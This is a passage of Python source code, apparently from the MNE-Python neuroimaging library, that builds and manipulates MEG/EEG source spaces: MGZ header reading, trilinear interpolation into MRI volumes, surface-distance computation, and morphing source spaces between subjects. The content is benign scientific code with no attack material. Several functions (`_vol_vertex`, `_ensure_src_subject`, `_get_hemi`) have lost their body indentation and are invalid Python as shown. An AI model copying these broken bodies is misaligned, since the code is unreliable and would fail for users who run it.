        maxdist = np.sqrt(((trans[:3, :3].sum(0) / 2.) ** 2).sum())
        bads = np.where(dists > maxdist)[0]
        # Update source info
        sp['inuse'][bads] = False
        sp['vertno'] = np.where(sp['inuse'] > 0)[0]
        sp['nuse'] = len(sp['vertno'])
        sp['seg_name'] = volume_label
        sp['mri_file'] = mri
        # Update log
        logger.info('%d sources remaining after excluding sources too far '
                    'from VOI voxels', sp['nuse'])
    # Omit unused vertices from the neighborhoods
    logger.info('Adjusting the neighborhood info...')
    # remove non source-space points
    log_inuse = sp['inuse'] > 0
    neigh[:, np.logical_not(log_inuse)] = -1
    # remove these points from neigh
    vertno = np.where(log_inuse)[0]
    sp['vertno'] = vertno
    old_shape = neigh.shape
    neigh = neigh.ravel()
    checks = np.where(neigh >= 0)[0]
    removes = np.logical_not(in1d(checks, vertno))
    neigh[checks[removes]] = -1
    neigh.shape = old_shape
    neigh = neigh.T
    # Thought we would need this, but C code keeps -1 vertices, so we will:
    # neigh = [n[n >= 0] for n in enumerate(neigh[vertno])]
    sp['neighbor_vert'] = neigh
    # Set up the volume data (needed for creating the interpolation matrix)
    r0 = minn * grid
    voxel_size = grid * np.ones(3)
    ras = np.eye(3)
    sp['src_mri_t'] = _make_voxel_ras_trans(r0, ras, voxel_size)
    sp['vol_dims'] = maxn - minn + 1
    return sp
def _vol_vertex(width, height, jj, kk, pp):
return jj + width * kk + pp * (width * height)
def _get_mgz_header(fname):
    """Adapted from nibabel to quickly extract header info

    Reads only the fixed-size binary header of a FreeSurfer ``.mgz``
    (gzip-compressed MGH) volume and returns a dict with:
    ``dims`` (3-element volume shape), ``vox2ras_tkr`` (tkregister
    voxel -> surface-RAS affine, in mm), and ``ras2vox`` (scanner-RAS ->
    voxel affine).
    """
    if not fname.endswith('.mgz'):
        raise IOError('Filename must end with .mgz')
    # MGH header layout; all fields are big-endian ('>')
    header_dtd = [('version', '>i4'), ('dims', '>i4', (4,)),
                  ('type', '>i4'), ('dof', '>i4'), ('goodRASFlag', '>i2'),
                  ('delta', '>f4', (3,)), ('Mdc', '>f4', (3, 3)),
                  ('Pxyz_c', '>f4', (3,))]
    header_dtype = np.dtype(header_dtd)
    with gzip_open(fname, 'rb') as fid:
        hdr_str = fid.read(header_dtype.itemsize)
    # view the raw bytes through the structured dtype (no copy)
    header = np.ndarray(shape=(), dtype=header_dtype,
                        buffer=hdr_str)
    # dims
    dims = header['dims'].astype(int)
    dims = dims[:3] if len(dims) == 4 else dims  # drop the 4th (frame) dim
    # vox2ras_tkr
    delta = header['delta']  # voxel sizes (mm)
    ds = np.array(delta, float)
    ns = np.array(dims * ds) / 2.0  # half field-of-view (mm)
    v2rtkr = np.array([[-ds[0], 0, 0, ns[0]],
                       [0, 0, ds[2], -ns[2]],
                       [0, -ds[1], 0, ns[1]],
                       [0, 0, 0, 1]], dtype=np.float32)
    # ras2vox
    d = np.diag(delta)
    pcrs_c = dims / 2.0  # center voxel
    Mdc = header['Mdc'].T  # direction cosines
    pxyz_0 = header['Pxyz_c'] - np.dot(Mdc, np.dot(d, pcrs_c))
    M = np.eye(4, 4)
    M[0:3, 0:3] = np.dot(Mdc, d)
    M[0:3, 3] = pxyz_0.T
    M = linalg.inv(M)  # invert the vox2ras affine to get ras2vox
    header = dict(dims=dims, vox2ras_tkr=v2rtkr, ras2vox=M)
    return header
def _add_interpolator(s, mri_name, add_interpolator):
    """Compute a sparse matrix to interpolate the data into an MRI volume

    Operates in-place on the volume source space dict ``s``: adds the MRI
    dimensions, the voxel/MRI/RAS transforms, and (if ``add_interpolator``)
    a CSR matrix of trilinear interpolation weights mapping source-space
    values onto the full MRI voxel grid.
    """
    # extract transformation information from mri
    logger.info('Reading %s...' % mri_name)
    header = _get_mgz_header(mri_name)
    mri_width, mri_height, mri_depth = header['dims']
    s.update(dict(mri_width=mri_width, mri_height=mri_height,
                  mri_depth=mri_depth))
    trans = header['vox2ras_tkr'].copy()
    trans[:3, :] /= 1000.0  # mm -> m
    s['vox_mri_t'] = Transform('mri_voxel', 'mri', trans)  # ras_tkr
    trans = linalg.inv(np.dot(header['vox2ras_tkr'], header['ras2vox']))
    trans[:3, 3] /= 1000.0  # mm -> m
    s['mri_ras_t'] = Transform('mri', 'ras', trans)  # ras
    s['mri_volume_name'] = mri_name
    nvox = mri_width * mri_height * mri_depth
    if not add_interpolator:
        # an all-zero matrix of the right shape stands in for the real one
        s['interpolator'] = sparse.csr_matrix((nvox, s['np']))
        return
    _print_coord_trans(s['src_mri_t'], 'Source space : ')
    _print_coord_trans(s['vox_mri_t'], 'MRI volume : ')
    _print_coord_trans(s['mri_ras_t'], 'MRI volume : ')
    #
    # Convert MRI voxels from destination (MRI volume) to source (volume
    # source space subset) coordinates
    #
    combo_trans = combine_transforms(s['vox_mri_t'],
                                     invert_transform(s['src_mri_t']),
                                     'mri_voxel', 'mri_voxel')
    combo_trans['trans'] = combo_trans['trans'].astype(np.float32)
    logger.info('Setting up interpolation...')
    # Loop over slices to save (lots of) memory
    # Note that it is the slowest incrementing index
    # This is equivalent to using mgrid and reshaping, but faster
    data = []
    indices = []
    indptr = np.zeros(nvox + 1, np.int32)
    for p in range(mri_depth):
        # build the (j, k, p) coordinates of every voxel in slice p
        js = np.arange(mri_width, dtype=np.float32)
        js = np.tile(js[np.newaxis, :],
                     (mri_height, 1)).ravel()
        ks = np.arange(mri_height, dtype=np.float32)
        ks = np.tile(ks[:, np.newaxis],
                     (1, mri_width)).ravel()
        ps = np.empty((mri_height, mri_width), np.float32).ravel()
        ps.fill(p)
        r0 = np.c_[js, ks, ps]
        del js, ks, ps
        # Transform our vertices from their MRI space into our source space's
        # frame (this is labeled as FIFFV_MNE_COORD_MRI_VOXEL, but it's
        # really a subset of the entire volume!)
        r0 = apply_trans(combo_trans['trans'], r0)
        rn = np.floor(r0).astype(int)
        # keep only voxels whose 8-corner cell lies inside the source grid
        maxs = (s['vol_dims'] - 1)[np.newaxis, :]
        good = np.where(np.logical_and(np.all(rn >= 0, axis=1),
                                       np.all(rn < maxs, axis=1)))[0]
        rn = rn[good]
        r0 = r0[good]
        # now we take each MRI voxel *in this space*, and figure out how
        # to make its value the weighted sum of voxels in the volume source
        # space. This is a 3D weighting scheme based (presumably) on the
        # fact that we know we're interpolating from one volumetric grid
        # into another.
        jj = rn[:, 0]
        kk = rn[:, 1]
        pp = rn[:, 2]
        # flat indices of the 8 corners of the enclosing source-grid cell
        vss = np.empty((len(jj), 8), np.int32)
        width = s['vol_dims'][0]
        height = s['vol_dims'][1]
        jjp1 = jj + 1
        kkp1 = kk + 1
        ppp1 = pp + 1
        vss[:, 0] = _vol_vertex(width, height, jj, kk, pp)
        vss[:, 1] = _vol_vertex(width, height, jjp1, kk, pp)
        vss[:, 2] = _vol_vertex(width, height, jjp1, kkp1, pp)
        vss[:, 3] = _vol_vertex(width, height, jj, kkp1, pp)
        vss[:, 4] = _vol_vertex(width, height, jj, kk, ppp1)
        vss[:, 5] = _vol_vertex(width, height, jjp1, kk, ppp1)
        vss[:, 6] = _vol_vertex(width, height, jjp1, kkp1, ppp1)
        vss[:, 7] = _vol_vertex(width, height, jj, kkp1, ppp1)
        del jj, kk, pp, jjp1, kkp1, ppp1
        # only keep voxels whose cell touches an in-use source point
        uses = np.any(s['inuse'][vss], axis=1)
        if uses.size == 0:
            continue
        vss = vss[uses].ravel()  # vertex (col) numbers in csr matrix
        indices.append(vss)
        # each kept voxel row gets exactly 8 nonzero entries
        indptr[good[uses] + p * mri_height * mri_width + 1] = 8
        del vss
        # figure out weights for each vertex
        r0 = r0[uses]
        rn = rn[uses]
        del uses, good
        # fractional position inside the cell -> trilinear weights
        xf = r0[:, 0] - rn[:, 0].astype(np.float32)
        yf = r0[:, 1] - rn[:, 1].astype(np.float32)
        zf = r0[:, 2] - rn[:, 2].astype(np.float32)
        omxf = 1.0 - xf
        omyf = 1.0 - yf
        omzf = 1.0 - zf
        # each entry in the concatenation corresponds to a row of vss
        data.append(np.array([omxf * omyf * omzf,
                              xf * omyf * omzf,
                              xf * yf * omzf,
                              omxf * yf * omzf,
                              omxf * omyf * zf,
                              xf * omyf * zf,
                              xf * yf * zf,
                              omxf * yf * zf], order='F').T.ravel())
        del xf, yf, zf, omxf, omyf, omzf
    # Compose the sparse matrix
    indptr = np.cumsum(indptr, out=indptr)
    indices = np.concatenate(indices)
    data = np.concatenate(data)
    s['interpolator'] = sparse.csr_matrix((data, indices, indptr),
                                          shape=(nvox, s['np']))
    logger.info(' %d/%d nonzero values [done]' % (len(data), nvox))
@verbose
def _filter_source_spaces(surf, limit, mri_head_t, src, n_jobs=1,
                          verbose=None):
    """Remove all source space points closer than a given limit (in mm)

    Operates in-place on each source space dict in ``src``: points outside
    ``surf`` (and, if ``limit > 0``, points closer than ``limit`` mm to it)
    are marked unused, and ``nuse``/``vertno`` are updated accordingly.
    ``mri_head_t`` is required when the source spaces are in head
    coordinates, so the points can be moved to the surface's MRI frame.
    """
    if src[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD and mri_head_t is None:
        raise RuntimeError('Source spaces are in head coordinates and no '
                           'coordinate transform was provided!')
    # How close are the source points to the surface?
    out_str = 'Source spaces are in '
    if src[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
        inv_trans = invert_transform(mri_head_t)
        out_str += 'head coordinates.'
    elif src[0]['coord_frame'] == FIFF.FIFFV_COORD_MRI:
        out_str += 'MRI coordinates.'
    else:
        out_str += 'unknown (%d) coordinates.' % src[0]['coord_frame']
    logger.info(out_str)
    out_str = 'Checking that the sources are inside the bounding surface'
    if limit > 0.0:
        out_str += ' and at least %6.1f mm away' % (limit)
    logger.info(out_str + ' (will take a few...)')
    for s in src:
        vertno = np.where(s['inuse'])[0]  # can't trust s['vertno'] this deep
        # Convert all points here first to save time
        r1s = s['rr'][vertno]
        if s['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
            r1s = apply_trans(inv_trans['trans'], r1s)
        # Check that the source is inside surface (often the inner skull)
        outside = _points_outside_surface(r1s, surf, n_jobs)
        omit_outside = np.sum(outside)
        # vectorized nearest using BallTree (or cdist)
        omit = 0
        if limit > 0.0:
            dists = _compute_nearest(surf['rr'], r1s, return_dists=True)[1]
            close = np.logical_and(dists < limit / 1000.0,
                                   np.logical_not(outside))
            omit = np.sum(close)
            outside = np.logical_or(outside, close)
        s['inuse'][vertno[outside]] = False
        s['nuse'] -= (omit + omit_outside)
        s['vertno'] = np.where(s['inuse'])[0]
        if omit_outside > 0:
            extras = [omit_outside]
            extras += ['s', 'they are'] if omit_outside > 1 else ['', 'it is']
            logger.info('%d source space point%s omitted because %s '
                        'outside the inner skull surface.' % tuple(extras))
        if omit > 0:
            extras = [omit]
            # BUG FIX: pluralize based on `omit` (the count being printed),
            # not `omit_outside`
            extras += ['s'] if omit > 1 else ['']
            extras += [limit]
            logger.info('%d source space point%s omitted because of the '
                        '%6.1f-mm distance limit.' % tuple(extras))
    logger.info('Thank you for waiting.')
@verbose
def _points_outside_surface(rr, surf, n_jobs=1, verbose=None):
    """Check whether points are outside a surface
    Parameters
    ----------
    rr : ndarray
        Nx3 array of points to check.
    surf : dict
        Surface with entries "rr" and "tris".
    Returns
    -------
    outside : ndarray
        1D logical array of size N for which points are outside the surface.
    """
    pts = np.atleast_2d(rr)
    assert pts.shape[1] == 3
    # split the triangles across jobs and sum the solid angle contributions
    # that each chunk subtends at every point
    parallel, my_solids, _ = parallel_func(_get_solids, n_jobs)
    tri_chunks = np.array_split(surf['tris'], n_jobs)
    angles = parallel(my_solids(surf['rr'][chunk], pts)
                      for chunk in tri_chunks)
    total = np.sum(angles, axis=0) / (2 * np.pi)
    # a point inside a closed surface subtends a normalized total of 1
    return np.abs(total - 1.0) > 1e-5
def _get_solids(tri_rrs, fros):
    """Helper for computing _sum_solids_div total angle in chunks

    For each point in ``fros`` (n_points x 3), sums the signed solid angles
    subtended by every triangle in ``tri_rrs`` (n_tris x 3 x 3). Points are
    processed in slices of 100 to bound the size of the
    (n_tris, n_slice_points) temporaries.
    """
    # NOTE: This incorporates the division by 4PI that used to be separate
    # for tri_rr in tri_rrs:
    #     v1 = fros - tri_rr[0]
    #     v2 = fros - tri_rr[1]
    #     v3 = fros - tri_rr[2]
    #     triple = np.sum(fast_cross_3d(v1, v2) * v3, axis=1)
    #     l1 = np.sqrt(np.sum(v1 * v1, axis=1))
    #     l2 = np.sqrt(np.sum(v2 * v2, axis=1))
    #     l3 = np.sqrt(np.sum(v3 * v3, axis=1))
    #     s = (l1 * l2 * l3 +
    #          np.sum(v1 * v2, axis=1) * l3 +
    #          np.sum(v1 * v3, axis=1) * l2 +
    #          np.sum(v2 * v3, axis=1) * l1)
    #     tot_angle -= np.arctan2(triple, s)
    # This is the vectorized version, but with a slicing heuristic to
    # prevent memory explosion
    tot_angle = np.zeros((len(fros)))
    slices = np.r_[np.arange(0, len(fros), 100), [len(fros)]]
    for i1, i2 in zip(slices[:-1], slices[1:]):
        # vectors from each point slice to each triangle's three vertices
        v1 = fros[i1:i2] - tri_rrs[:, 0, :][:, np.newaxis]
        v2 = fros[i1:i2] - tri_rrs[:, 1, :][:, np.newaxis]
        v3 = fros[i1:i2] - tri_rrs[:, 2, :][:, np.newaxis]
        triples = _fast_cross_nd_sum(v1, v2, v3)
        l1 = np.sqrt(np.sum(v1 * v1, axis=2))
        l2 = np.sqrt(np.sum(v2 * v2, axis=2))
        l3 = np.sqrt(np.sum(v3 * v3, axis=2))
        ss = (l1 * l2 * l3 +
              np.sum(v1 * v2, axis=2) * l3 +
              np.sum(v1 * v3, axis=2) * l2 +
              np.sum(v2 * v3, axis=2) * l1)
        # accumulate via arctan2(triple product, denominator), summed over
        # all triangles for each point in the slice
        tot_angle[i1:i2] = -np.sum(np.arctan2(triples, ss), axis=0)
    return tot_angle
@verbose
def _ensure_src(src, verbose=None):
    """Helper to ensure we have a source space

    Accepts either a SourceSpaces instance (returned as-is) or a filename
    (read from disk); anything else raises ValueError.
    """
    if isinstance(src, string_types):
        src_fname = src
        if not op.isfile(src_fname):
            raise IOError('Source space file "%s" not found' % src_fname)
        logger.info('Reading %s...' % src_fname)
        src = read_source_spaces(src_fname, verbose=False)
    if isinstance(src, SourceSpaces):
        return src
    raise ValueError('src must be a string or instance of SourceSpaces')
def _ensure_src_subject(src, subject):
src_subject = src[0].get('subject_his_id', None)
if subject is None:
subject = src_subject
if subject is None:
raise ValueError('source space is too old, subject must be '
'provided')
elif src_subject is not None and subject != src_subject:
raise ValueError('Mismatch between provided subject "%s" and subject '
'name "%s" in the source space'
% (subject, src_subject))
return subject
@verbose
def add_source_space_distances(src, dist_limit=np.inf, n_jobs=1, verbose=None):
    """Compute inter-source distances along the cortical surface

    This function will also try to add patch info for the source space.
    It will only occur if the ``dist_limit`` is sufficiently high that all
    points on the surface are within ``dist_limit`` of a point in the
    source space.

    Parameters
    ----------
    src : instance of SourceSpaces
        The source spaces to compute distances for.
    dist_limit : float
        The upper limit of distances to include (in meters).
        Note: if limit < np.inf, scipy > 0.13 (bleeding edge as of
        10/2013) must be installed.
    n_jobs : int
        Number of jobs to run in parallel. Will only use (up to) as many
        cores as there are source spaces.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    src : instance of SourceSpaces
        The original source spaces, with distance information added.
        The distances are stored in src[n]['dist'].
        Note: this function operates in-place.

    Notes
    -----
    Requires scipy >= 0.11 (> 0.13 for `dist_limit < np.inf`).

    This function can be memory- and CPU-intensive. On a high-end machine
    (2012) running 6 jobs in parallel, an ico-5 (10242 per hemi) source space
    takes about 10 minutes to compute all distances (`dist_limit = np.inf`).
    With `dist_limit = 0.007`, computing distances takes about 1 minute.

    We recommend computing distances once per source space and then saving
    the source space to disk, as the computed distances will automatically be
    stored along with the source space data for future use.
    """
    n_jobs = check_n_jobs(n_jobs)
    src = _ensure_src(src)
    if not np.isscalar(dist_limit):
        raise ValueError('limit must be a scalar, got %s' % repr(dist_limit))
    if not check_version('scipy', '0.11'):
        raise RuntimeError('scipy >= 0.11 must be installed (or > 0.13 '
                           'if dist_limit < np.inf')
    if not all(s['type'] == 'surf' for s in src):
        raise RuntimeError('Currently all source spaces must be of surface '
                           'type')

    if dist_limit < np.inf:
        # can't do introspection on dijkstra function because it's Cython,
        # so we'll just try quickly here
        try:
            sparse.csgraph.dijkstra(sparse.csr_matrix(np.zeros((2, 2))),
                                    limit=1.0)
        except TypeError:
            raise RuntimeError('Cannot use "limit < np.inf" unless scipy '
                               '> 0.13 is installed')

    parallel, p_fun, _ = parallel_func(_do_src_distances, n_jobs)
    min_dists = list()
    min_idxs = list()
    logger.info('Calculating source space distances (limit=%s mm)...'
                % (1000 * dist_limit))
    for s in src:
        connectivity = mesh_dist(s['tris'], s['rr'])
        # Split the source vertices across jobs; each job returns
        # (distance chunk, nearest source vertex per surface point,
        # distance to that nearest vertex) -- see _do_src_distances.
        d = parallel(p_fun(connectivity, s['vertno'], r, dist_limit)
                     for r in np.array_split(np.arange(len(s['vertno'])),
                                             n_jobs))
        # deal with indexing so we can add patch info
        min_idx = np.array([dd[1] for dd in d])
        min_dist = np.array([dd[2] for dd in d])
        # Reduce over jobs: keep, for every surface point, the closest
        # source-space vertex found by any job.
        midx = np.argmin(min_dist, axis=0)
        range_idx = np.arange(len(s['rr']))
        min_dist = min_dist[midx, range_idx]
        min_idx = min_idx[midx, range_idx]
        min_dists.append(min_dist)
        min_idxs.append(min_idx)
        # now actually deal with distances, convert to sparse representation
        d = np.concatenate([dd[0] for dd in d]).ravel()  # already float32
        # Zero entries mean "not computed / beyond limit" and are dropped
        # so the CSR matrix only stores finite, in-limit distances.
        idx = d > 0
        d = d[idx]
        i, j = np.meshgrid(s['vertno'], s['vertno'])
        i = i.ravel()[idx]
        j = j.ravel()[idx]
        d = sparse.csr_matrix((d, (i, j)),
                              shape=(s['np'], s['np']), dtype=np.float32)
        s['dist'] = d
        s['dist_limit'] = np.array([dist_limit], np.float32)

    # Let's see if our distance was sufficient to allow for patch info
    if not any(np.any(np.isinf(md)) for md in min_dists):
        # Patch info can be added!
        for s, min_dist, min_idx in zip(src, min_dists, min_idxs):
            s['nearest'] = min_idx
            s['nearest_dist'] = min_dist
            _add_patch_info(s)
    else:
        logger.info('Not adding patch information, dist_limit too small')
    return src
def _do_src_distances(con, vertno, run_inds, limit):
    """Helper to compute source space distances in chunks

    Parameters: ``con`` is a sparse surface adjacency/distance graph,
    ``vertno`` the source-space vertex numbers, ``run_inds`` the indices
    into ``vertno`` this job is responsible for, and ``limit`` the
    maximum distance to compute (np.inf for no limit).

    Returns (d, min_idx, min_dist): the distance rows for this job's
    vertices restricted to ``vertno`` columns, plus for every surface
    point the index of (and distance to) its nearest source vertex.
    """
    if limit < np.inf:
        # limit= keyword only exists in newer scipy (checked by caller)
        func = partial(sparse.csgraph.dijkstra, limit=limit)
    else:
        func = sparse.csgraph.dijkstra
    chunk_size = 20  # save memory by chunking (only a little slower)
    lims = np.r_[np.arange(0, len(run_inds), chunk_size), len(run_inds)]
    n_chunks = len(lims) - 1
    # eventually we want this in float32, so save memory by only storing 32-bit
    d = np.empty((len(run_inds), len(vertno)), np.float32)
    min_dist = np.empty((n_chunks, con.shape[0]))
    min_idx = np.empty((n_chunks, con.shape[0]), np.int32)
    range_idx = np.arange(con.shape[0])
    for li, (l1, l2) in enumerate(zip(lims[:-1], lims[1:])):
        idx = vertno[run_inds[l1:l2]]
        # Full dijkstra rows for this chunk of source vertices.
        out = func(con, indices=idx)
        # Per-chunk nearest source vertex for every surface point.
        midx = np.argmin(out, axis=0)
        min_idx[li] = idx[midx]
        min_dist[li] = out[midx, range_idx]
        d[l1:l2] = out[:, vertno]
    # Reduce across chunks to the overall nearest vertex/distance.
    midx = np.argmin(min_dist, axis=0)
    min_dist = min_dist[midx, range_idx]
    min_idx = min_idx[midx, range_idx]
    d[d == np.inf] = 0  # scipy will give us np.inf for uncalc. distances
    return d, min_idx, min_dist
def get_volume_labels_from_aseg(mgz_fname):
    """Returns a list of names of segmented volumes.

    Parameters
    ----------
    mgz_fname : str
        Filename to read. Typically aseg.mgz or some variant in the
        freesurfer pipeline.

    Returns
    -------
    label_names : list of str
        The names of segmented volumes included in this mgz file.

    Notes
    -----
    .. versionadded:: 0.9.0
    """
    import nibabel as nib

    # Load the segmentation volume, then translate every unique integer
    # label found in it into a name via the FreeSurfer lookup table.
    volume = nib.load(mgz_fname).get_data()
    lut = _get_lut()
    names = []
    for label_id in np.unique(volume):
        names.append(lut[lut['id'] == label_id]['name'][0].decode('utf-8'))
    # Case-insensitive alphabetical ordering.
    return sorted(names, key=lambda name: name.lower())
def _get_hemi(s):
"""Helper to get a hemisphere from a given source space"""
if s['type'] != 'surf':
raise RuntimeError('Only surface source spaces supported')
if s['id'] == FIFF.FIFFV_MNE_SURF_LEFT_HEMI:
return 'lh', 0, s['id']
elif s['id'] == FIFF.FIFFV_MNE_SURF_RIGHT_HEMI:
return 'rh', 1, s['id']
else:
raise ValueError('unknown surface ID %s' % s['id'])
def _get_vertex_map_nn(fro_src, subject_from, subject_to, hemi, subjects_dir,
                       to_neighbor_tri=None):
    """Helper to get a nearest-neigbor vertex match for a given hemi src

    The to_neighbor_tri can optionally be passed in to avoid recomputation
    if it's already available.

    Returns ``best``, an array mapping each "from" vertex number to a
    unique vertex number on the "to" subject's registered sphere.
    """
    # adapted from mne_make_source_space.c, knowing accurate=False (i.e.
    # nearest-neighbor mode should be used)
    logger.info('Mapping %s %s -> %s (nearest neighbor)...'
                % (hemi, subject_from, subject_to))
    regs = [op.join(subjects_dir, s, 'surf', '%s.sphere.reg' % hemi)
            for s in (subject_from, subject_to)]
    reg_fro, reg_to = [_read_surface_geom(r, patch_stats=False) for r in regs]
    if to_neighbor_tri is None:
        # NOTE(review): to_neighbor_tri is computed here but not referenced
        # again in this function -- _get_surf_neighbors below may rely on it
        # being attached to reg_to elsewhere; confirm whether this branch is
        # still needed.
        to_neighbor_tri = _triangle_neighbors(reg_to['tris'], reg_to['np'])
    # Tracks destination vertices that have already been claimed, so the
    # mapping stays one-to-one.
    morph_inuse = np.zeros(len(reg_to['rr']), bool)
    best = np.zeros(fro_src['np'], int)
    ones = _compute_nearest(reg_to['rr'], reg_fro['rr'][fro_src['vertno']])
    for v, one in zip(fro_src['vertno'], ones):
        # if it were actually a proper morph map, we would do this, but since
        # we know it's nearest neighbor list, we don't need to:
        # this_mm = mm[v]
        # one = this_mm.indices[this_mm.data.argmax()]
        if morph_inuse[one]:
            # Try the nearest neighbors
            neigh = _get_surf_neighbors(reg_to, one)  # on demand calc
            was = one
            one = neigh[np.where(~morph_inuse[neigh])[0]]
            if len(one) == 0:
                raise RuntimeError('vertex %d would be used multiple times.'
                                   % one)
            one = one[0]
            logger.info('Source space vertex moved from %d to %d because of '
                        'double occupation.' % (was, one))
        best[v] = one
        morph_inuse[one] = True
    return best
@verbose
def morph_source_spaces(src_from, subject_to, surf='white', subject_from=None,
                        subjects_dir=None, verbose=None):
    """Morph an existing source space to a different subject

    .. warning:: This can be used in place of morphing source estimates for
                 multiple subjects, but there may be consequences in terms
                 of dipole topology.

    Parameters
    ----------
    src_from : instance of SourceSpaces
        Surface source spaces to morph.
    subject_to : str
        The destination subject.
    surf : str
        The brain surface to use for the new source space.
    subject_from : str | None
        The "from" subject. For most source spaces this shouldn't need
        to be provided, since it is stored in the source space itself.
    subjects_dir : string, or None
        Path to SUBJECTS_DIR if it is not set in the environment.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    src : instance of SourceSpaces
        The morphed source spaces.

    Notes
    -----
    .. versionadded:: 0.10.0
    """
    # adapted from mne_make_source_space.c
    src_from = _ensure_src(src_from)
    subject_from = _ensure_src_subject(src_from, subject_from)
    subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
    src_out = list()
    for fro in src_from:
        hemi, idx, id_ = _get_hemi(fro)
        to = op.join(subjects_dir, subject_to, 'surf', '%s.%s' % (hemi, surf,))
        logger.info('Reading destination surface %s' % (to,))
        to = _read_surface_geom(to, patch_stats=False, verbose=False)
        _complete_surface_info(to)
        # Now we morph the vertices to the destination
        # The C code does something like this, but with a nearest-neighbor
        # mapping instead of the weighted one::
        #
        #     >>> mm = read_morph_map(subject_from, subject_to, subjects_dir)
        #
        # Here we use a direct NN calculation, since picking the max from the
        # existing morph map (which naively one might expect to be equivalent)
        # differs for ~3% of vertices.
        best = _get_vertex_map_nn(fro, subject_from, subject_to, hemi,
                                  subjects_dir, to['neighbor_tri'])
        # Drop surface-stat keys not wanted in the output source space.
        for key in ('neighbor_tri', 'tri_area', 'tri_cent', 'tri_nn',
                    'use_tris'):
            del to[key]

        # Remap vertices/triangles through the nearest-neighbor map.
        to['vertno'] = np.sort(best[fro['vertno']])
        to['inuse'] = np.zeros(len(to['rr']), int)
        to['inuse'][to['vertno']] = True
        to['use_tris'] = best[fro['use_tris']]
        # rr divided by 1000 -- presumably mm -> m conversion; confirm
        # against _read_surface_geom's units.
        to.update(nuse=len(to['vertno']), nuse_tri=len(to['use_tris']),
                  nearest=None, nearest_dist=None, patch_inds=None, pinfo=None,
                  dist=None, id=id_, dist_limit=None, type='surf',
                  coord_frame=FIFF.FIFFV_COORD_MRI, subject_his_id=subject_to,
                  rr=to['rr'] / 1000.)
        src_out.append(to)
        logger.info('[done]\n')
    info = dict(working_dir=os.getcwd(),
                command_line=_get_call_line(in_verbose=True))
    return SourceSpaces(src_out, info=info)
@verbose
def _get_morph_src_reordering(vertices, src_from, subject_from, subject_to,
                              subjects_dir=None, verbose=None):
    """Get the reordering indices for a morphed source space

    Parameters
    ----------
    vertices : list
        The vertices for the left and right hemispheres.
    src_from : instance of SourceSpaces
        The original source space.
    subject_from : str
        The source subject.
    subject_to : str
        The destination subject.
    subjects_dir : string, or None
        Path to SUBJECTS_DIR if it is not set in the environment.
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    Returns
    -------
    data_idx : ndarray, shape (n_vertices,)
        The array used to reshape the data.
    from_vertices : list
        The right and left hemisphere vertex numbers for the "from" subject.
    """
    subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
    from_vertices = list()
    data_idxs = list()
    offset = 0
    for ii, hemi in enumerate(('lh', 'rh')):
        # Get the mapping from the original source space to the destination
        # subject's surface vertex numbers
        best = _get_vertex_map_nn(src_from[ii], subject_from, subject_to,
                                  hemi, subjects_dir)
        full_mapping = best[src_from[ii]['vertno']]
        # Tragically, we might not have all of our vertno left (e.g. because
        # some are omitted during fwd calc), so we must do some indexing magic:

        # From all vertices, a subset could be chosen by fwd calc:
        used_vertices = in1d(full_mapping, vertices[ii])
        from_vertices.append(src_from[ii]['vertno'][used_vertices])
        remaining_mapping = full_mapping[used_vertices]
        # Sanity check: the surviving destination vertices must exactly
        # match the requested ones, otherwise the map (or subject) is wrong.
        if not np.array_equal(np.sort(remaining_mapping), vertices[ii]) or \
                not in1d(vertices[ii], full_mapping).all():
            raise RuntimeError('Could not map vertices, perhaps the wrong '
                               'subject "%s" was provided?' % subject_from)

        # And our data have been implicitly remapped by the forced ascending
        # vertno order in source spaces
        implicit_mapping = np.argsort(remaining_mapping)  # happens to data
        data_idx = np.argsort(implicit_mapping)  # to reverse the mapping
        data_idx += offset  # hemisphere offset
        data_idxs.append(data_idx)
        offset += len(implicit_mapping)
    data_idx = np.concatenate(data_idxs)
    # this one is really just a sanity check for us, should never be violated
    # by users
    assert np.array_equal(np.sort(data_idx),
                          np.arange(sum(len(v) for v in vertices)))
    return data_idx, from_vertices
def _compare_source_spaces(src0, src1, mode='exact', dist_tol=1.5e-3):
    """Compare two source spaces

    Note: this function is also used by forward/tests/test_make_forward.py

    ``mode`` is either 'exact' or contains 'approx' (optionally with
    'nointerp' appended to skip interpolator comparison).
    """
    from nose.tools import assert_equal, assert_true
    from numpy.testing import assert_allclose, assert_array_equal
    from scipy.spatial.distance import cdist
    if mode != 'exact' and 'approx' not in mode:  # 'nointerp' can be appended
        raise RuntimeError('unknown mode %s' % mode)

    for s0, s1 in zip(src0, src1):
        # first check the keys
        a, b = set(s0.keys()), set(s1.keys())
        assert_equal(a, b, str(a ^ b))
        for name in ['nuse', 'ntri', 'np', 'type', 'id']:
            assert_equal(s0[name], s1[name], name)
        for name in ['subject_his_id']:
            if name in s0 or name in s1:
                assert_equal(s0[name], s1[name], name)
        for name in ['interpolator']:
            if name in s0 or name in s1:
                diffs = (s0['interpolator'] - s1['interpolator']).data
                if len(diffs) > 0 and 'nointerp' not in mode:
                    # 5%
                    assert_true(np.sqrt(np.mean(diffs ** 2)) < 0.10, name)
        for name in ['nn', 'rr', 'nuse_tri', 'coord_frame', 'tris']:
            if s0[name] is None:
                assert_true(s1[name] is None, name)
            else:
                if mode == 'exact':
                    assert_array_equal(s0[name], s1[name], name)
                else:  # 'approx' in mode
                    atol = 1e-3 if name == 'nn' else 1e-4
                    assert_allclose(s0[name], s1[name], rtol=1e-3, atol=atol,
                                    err_msg=name)
        for name in ['seg_name']:
            if name in s0 or name in s1:
                assert_equal(s0[name], s1[name], name)
        if mode == 'exact':
            for name in ['inuse', 'vertno', 'use_tris']:
                assert_array_equal(s0[name], s1[name], err_msg=name)
            # these fields will exist if patch info was added, these are
            # not tested in mode == 'approx'
            for name in ['nearest', 'nearest_dist']:
                if s0[name] is None:
                    assert_true(s1[name] is None, name)
                else:
                    assert_array_equal(s0[name], s1[name])
            for name in ['dist_limit']:
                assert_true(s0[name] == s1[name], name)
            for name in ['dist']:
                if s0[name] is not None:
                    assert_equal(s1[name].shape, s0[name].shape)
                    # Sparse difference has no stored entries iff identical.
